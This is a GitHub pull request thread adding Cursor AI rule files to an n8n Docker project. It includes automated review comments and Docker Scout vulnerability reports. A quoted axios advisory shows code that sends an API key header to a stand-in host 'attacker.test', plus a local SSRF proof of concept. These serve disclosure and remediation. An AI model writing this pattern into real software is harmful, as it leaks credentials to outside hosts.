feat(rules): add code quality cursor rules

[anatolyshipitz]

feat(rules): add code quality cursor rules

Description

This PR adds a set of code quality cursor rules to improve AI interactions and maintain consistency across the project.

Changes

• Add no-apologies rule
• Add no-summaries rule
• Add no-unnecessary-confirmations rule
• Add no-unnecessary-updates rule
• Add preserve-existing-code rule
• Add single-chunk-edits rule
• Add verify-information rule

Impact

These rules will help:

• Maintain consistent and high-quality AI interactions
• Reduce unnecessary confirmations and updates
• Preserve existing code and functionality
• Ensure information is verified before presentation
• Streamline the editing process with single-chunk edits

[coderabbitai]

Walkthrough

A set of new documentation and rule files were added under the .cursor/rules/ directory, covering topics such as Conventional Commits, Docker configuration, project structure, service configuration, and several process and style rules. These rules address commit message standards, editing practices, information verification, and code preservation. The .gitignore file was also updated to refine ignored files and directories, particularly for IDE and system files, and to allow inclusion of .cursor/rules/ while ignoring other .cursor/ contents. The GitHub Actions workflow for code quality was updated to use a newer version of the SARIF upload action in the Docker Security Scanning job.

Changes

File(s)	Change Summary
.cursor/rules/conventional-commits.mdc	Added documentation specifying Conventional Commit Message standards, including commit structure, allowed types, semantic versioning correlation, and examples.
.cursor/rules/docker-configuration.mdc	Added Docker Configuration Guide detailing service setup, Docker images, volumes, network, and port mappings.
.cursor/rules/project-structure.mdc	Added project structure documentation outlining repository architecture, key components, and service ports.
.cursor/rules/service-configuration.mdc	Added service configuration guide with setup instructions, health checks, access URLs, and troubleshooting steps.
.cursor/rules/no-apologies-rule.mdc .cursor/rules/no-summaries-rule.mdc .cursor/rules/no-unnecessary-confirmations-rule.mdc .cursor/rules/no-unnecessary-updates-rule.mdc .cursor/rules/preserve-existing-code-rule.mdc .cursor/rules/single-chunk-edits-rule.mdc .cursor/rules/verify-information-rule.mdc	Added various rule files specifying process and style guidelines, such as prohibiting apologies, summaries, unnecessary confirmations, unnecessary updates, enforcing code preservation, single-chunk edits, and information verification.
.gitignore	Refined ignore patterns for IDE, system, and cache files; adjusted rules to allow .cursor/rules/ but ignore other .cursor/ contents.
.github/workflows/code-quality.yml	Updated the Docker Security Scanning job to use version 3 of the github/codeql-action/upload-sarif action instead of version 2.

Sequence Diagram(s)

sequenceDiagram
    participant Developer
    participant Repo
    participant RulesEngine

    Developer->>Repo: Add/commit files and documentation
    Repo->>RulesEngine: Apply .cursor/rules/* rules on commit, edit, and review
    RulesEngine-->>Developer: Enforce commit message standards, editing practices, info verification, etc.

Loading

Possibly related PRs

• Add Docker Scout security scanning to CI workflow #5: Modified the Docker Scout security scanning step in the GitHub Actions workflow by adding environment variables for authentication, directly related to the current update of the same workflow file.

---

📜 Recent review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 509dd04 and b588652.

📒 Files selected for processing (1)

• .github/workflows/code-quality.yml (1 hunks)

🚧 Files skipped from review as they are similar to previous changes (1)

• .github/workflows/code-quality.yml

⏰ Context from checks skipped due to timeout of 90000ms (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

---

🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

• Review comments: Directly reply to a review comment made by CodeRabbit. Example:
  • I pushed a fix in commit <commit_id>, please review it.
  • Generate unit testing code for this file.
  • Open a follow-up GitHub issue for this discussion.
• Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
  • @coderabbitai generate unit testing code for this file.
  • @coderabbitai modularize this function.
• PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
  • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
  • @coderabbitai read src/utils.ts and generate unit testing code.
  • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
  • @coderabbitai help me debug CodeRabbit configuration file.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

• @coderabbitai pause to pause the reviews on a PR.
• @coderabbitai resume to resume the paused reviews.
• @coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
• @coderabbitai full review to do a full review from scratch and review all the files again.
• @coderabbitai summary to regenerate the summary of the PR.
• @coderabbitai generate docstrings to generate docstrings for this PR.
• @coderabbitai generate sequence diagram to generate a sequence diagram of the changes in this PR.
• @coderabbitai resolve resolve all the CodeRabbit review comments.
• @coderabbitai configuration to show the current CodeRabbit configuration for the repository.
• @coderabbitai help to get help.

Other keywords and placeholders

• Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
• Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
• Add @coderabbitai anywhere in the PR title to generate the title automatically.

CodeRabbit Configuration File (.coderabbit.yaml)

• You can programmatically configure CodeRabbit by adding a .coderabbit.yaml file to the root of your repository.
• Please see the configuration documentation for more information.
• If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json

Documentation and Community

• Visit our Documentation for detailed information on how to use CodeRabbit.
• Join our Discord Community to get help, request features, and share feedback.
• Follow us on X/Twitter for updates and announcements.

[github-actions]

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest

digest	sha256:03e1afaf63dbdec8f0d1ee90ffa1977582ce467562192944b35549a143019068
vulnerabilities
platform	linux/amd64
size	243 MB
packages	1628

📦 Base Image node:20-alpine

also known as	20-alpine3.21 20.19-alpine 20.19-alpine3.21 20.19.0-alpine 20.19.0-alpine3.21 iron-alpine iron-alpine3.21
digest	sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilities

stdlib 1.24.0 (golang) pkg:golang/stdlib@1.24.0 Affected range >=1.24.0-0 <1.24.2 Fixed version 1.24.2 EPSS Score 0.015% EPSS Percentile 2nd percentile Description The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

semver 5.3.0 (npm) pkg:npm/semver@5.3.0 Inefficient Regular Expression Complexity Affected range <5.7.2 Fixed version 5.7.2 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.308% EPSS Percentile 53rd percentile Description Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

pdfjs-dist 2.16.105 (npm) pkg:npm/pdfjs-dist@2.16.105 Affected range <=4.1.392 Fixed version 4.2.67 CVSS Score 8.8 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H EPSS Score 14.484% EPSS Percentile 94th percentile Description Impact If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain. Patches The patch removes the use of eval: mozilla/pdf.js#18015 Workarounds Set the option isEvalSupported to false. References https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

cross-spawn 7.0.3 (npm) pkg:npm/cross-spawn@7.0.3 Inefficient Regular Expression Complexity Affected range >=7.0.0 <7.0.5 Fixed version 7.0.5 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.132% EPSS Percentile 34th percentile Description Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

axios 1.7.4 (npm) pkg:npm/axios@1.7.4 Server-Side Request Forgery (SSRF) Affected range >=1.0.0 <1.8.2 Fixed version 1.8.2 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P EPSS Score 0.056% EPSS Percentile 18th percentile Description Summary A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463 A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. Details Consider the following code snippet: import axios from "axios"; const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, }); // const userId = "123"; const userId = "http://attacker.test/"; await internalAPIClient.get(userId); // SSRF In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers. It is recommended that: When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL. Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL. PoC Follow the steps below to reproduce the issue: Set up two simple HTTP servers: mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 & Create a script (e.g., main.js): import axios from "axios"; const client = axios.create({ baseURL: "http://localhost:10001/" }); const response = await client.get("http://localhost:10002/"); console.log(response.data); Run the script: $ node main.js this is server2 Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/. Impact Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed. SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running. Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

@azure/identity 3.4.2 (npm) pkg:npm/%40azure/identity@3.4.2 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Affected range <4.2.1 Fixed version 4.2.1 CVSS Score 6.8 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N EPSS Score 0.116% EPSS Percentile 32nd percentile Description Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.

snowflake-sdk 1.12.0 (npm) pkg:npm/snowflake-sdk@1.12.0 Improper Preservation of Permissions Affected range >=1.12.0 <=2.0.1 Fixed version 2.0.2 CVSS Score 4.4 CVSS Vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N EPSS Score 0.012% EPSS Percentile 1st percentile Description Issue Snowflake discovered and remediated a vulnerability in the Snowflake NodeJS Driver. File permissions checks of the temporary credential cache could be bypassed by an attacker with write access to the local cache directory. This vulnerability affects versions 1.12.0 through 2.0.1 on Linux. Snowflake fixed the issue in version 2.0.2. Vulnerability Details On Linux, when either EXTERNALBROWSER or USERNAME_PASSWORD_MFA authentication methods are used with temporary credential caching enabled, the Snowflake NodeJS Driver will cache temporary credentials in a local file. Due to a bug, the check verifying that the cache file can be accessed only by the user running the Driver always succeeded, but didn’t verify the permissions or the ownership correctly. An attacker with write access to the local cache folder could plant an empty file there and the Driver would use it to store temporary credentials instead of rejecting it due to overly broad permissions. Solution Snowflake released version 2.0.2 of the Snowflake NodeJS Driver, which fixes this issue. We recommend users upgrade to version 2.0.2. Additional Information If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our Vulnerability Disclosure Policy.

[coderabbitai]

Actionable comments posted: 11

🧹 Nitpick comments (8)

.cursor/rules/service-configuration.mdc (5)

1-5: Populate front matter metadata
The YAML front matter has empty description and globs fields, which reduces discoverability and may confuse tooling that relies on these values. Consider adding a concise summary under description and listing any relevant file patterns under globs (or removing them if not needed).

---

9-12: Clarify link formatting for the setup script
The link [scripts/setup_volumes.sh](mdc:scripts/setup_volumes.sh) uses a custom mdc: scheme. If your renderer doesn’t support it, switch to a standard relative path link (for example, [scripts/setup_volumes.sh](../scripts/setup_volumes.sh)) or document the custom protocol.

---

14-20: Include sample invocation for health checks
Listing the endpoints is helpful, but users may benefit from seeing how to invoke the verification script. For example, wrap bash scripts/check_services.sh in a code block and show a snippet of expected output or typical error messages.

---

27-27: Specify container/service name for logs
The instruction docker logs is incomplete—it requires a container name or ID. For Docker Compose environments, consider docker compose logs -f <service> or explicitly docker logs <container> to guide the user.

---

30-31: Reference the setup script explicitly or merge steps
Step 4 (“Run setup script for volume mount issues”) duplicates the earlier setup instructions. Either point directly to ./scripts/setup_volumes.sh here or merge this step with the initial “Setup Instructions” to avoid redundancy.

.cursor/rules/conventional-commits.mdc (3)

6-9: Add direct link to the Conventional Commits spec
Rather than referring generically, embed a hyperlink to the official specification. For example:

Use the [Conventional Commits](https://conventionalcommits.org/) specification to generate commit messages.

---

12-18: Specify language for the code block
The commit message structure is enclosed in triple backticks without a language. For better syntax highlighting, declare it as e.g.

<type>[optional scope]: <description>
…

---

22-26: Standardize bullet formatting for commit types
The first three list items include the colon inside backticks (e.g., `fix`:) while the “Other allowed types” line embeds colons in each type. Align these—for example, remove trailing colons within the code ticks or make all types consistent.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between d512f88 and 6e98ef2.

📒 Files selected for processing (12)

• .cursor/rules/conventional-commits.mdc (1 hunks)
• .cursor/rules/docker-configuration.mdc (1 hunks)
• .cursor/rules/no-apologies-rule.mdc (1 hunks)
• .cursor/rules/no-summaries-rule.mdc (1 hunks)
• .cursor/rules/no-unnecessary-confirmations-rule.mdc (1 hunks)
• .cursor/rules/no-unnecessary-updates-rule.mdc (1 hunks)
• .cursor/rules/preserve-existing-code-rule.mdc (1 hunks)
• .cursor/rules/project-structure.mdc (1 hunks)
• .cursor/rules/service-configuration.mdc (1 hunks)
• .cursor/rules/single-chunk-edits-rule.mdc (1 hunks)
• .cursor/rules/verify-information-rule.mdc (1 hunks)
• .gitignore (1 hunks)

⏰ Context from checks skipped due to timeout of 90000ms (2)

• GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (1)

.gitignore (1)

10-16: Standard IDE and OS artifacts ignored
The added patterns (.idea/, .vscode/, *.swp, *.swo, and .DS_Store) correctly exclude common IDE and temporary files. This aligns with best practices for cross-platform development.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[github-actions]

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest

digest	sha256:5d0968306cfd5c6b1cac8fc4ddaabe692c35b0fd8e81dc8b56a6ab9755dabdc7
vulnerabilities
platform	linux/amd64
size	243 MB
packages	1628

📦 Base Image node:20-alpine

also known as	20-alpine3.21 20.19-alpine 20.19-alpine3.21 20.19.0-alpine 20.19.0-alpine3.21 iron-alpine iron-alpine3.21
digest	sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilities

stdlib 1.24.0 (golang) pkg:golang/stdlib@1.24.0 Affected range >=1.24.0-0 <1.24.2 Fixed version 1.24.2 EPSS Score 0.015% EPSS Percentile 2nd percentile Description The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

axios 1.7.4 (npm) pkg:npm/axios@1.7.4 Server-Side Request Forgery (SSRF) Affected range >=1.0.0 <1.8.2 Fixed version 1.8.2 CVSS Score 7.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P EPSS Score 0.056% EPSS Percentile 18th percentile Description Summary A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463 A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. Details Consider the following code snippet: import axios from "axios"; const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, }); // const userId = "123"; const userId = "http://attacker.test/"; await internalAPIClient.get(userId); // SSRF In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers. It is recommended that: When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL. Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL. PoC Follow the steps below to reproduce the issue: Set up two simple HTTP servers: mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 & Create a script (e.g., main.js): import axios from "axios"; const client = axios.create({ baseURL: "http://localhost:10001/" }); const response = await client.get("http://localhost:10002/"); console.log(response.data); Run the script: $ node main.js this is server2 Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/. Impact Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed. SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running. Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

semver 5.3.0 (npm) pkg:npm/semver@5.3.0 Inefficient Regular Expression Complexity Affected range <5.7.2 Fixed version 5.7.2 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.308% EPSS Percentile 53rd percentile Description Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

pdfjs-dist 2.16.105 (npm) pkg:npm/pdfjs-dist@2.16.105 Affected range <=4.1.392 Fixed version 4.2.67 CVSS Score 8.8 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H EPSS Score 14.484% EPSS Percentile 94th percentile Description Impact If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain. Patches The patch removes the use of eval: mozilla/pdf.js#18015 Workarounds Set the option isEvalSupported to false. References https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

cross-spawn 7.0.3 (npm) pkg:npm/cross-spawn@7.0.3 Inefficient Regular Expression Complexity Affected range >=7.0.0 <7.0.5 Fixed version 7.0.5 CVSS Score 7.5 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H EPSS Score 0.132% EPSS Percentile 34th percentile Description Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.